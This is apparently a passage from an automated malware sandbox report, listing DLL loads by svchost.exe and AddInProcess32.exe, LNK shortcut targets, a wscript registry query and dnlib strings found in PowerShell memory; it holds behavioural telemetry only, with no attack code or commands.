            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Google Drive.lnk.13.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.13.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.13.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.13.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.13.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.13.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
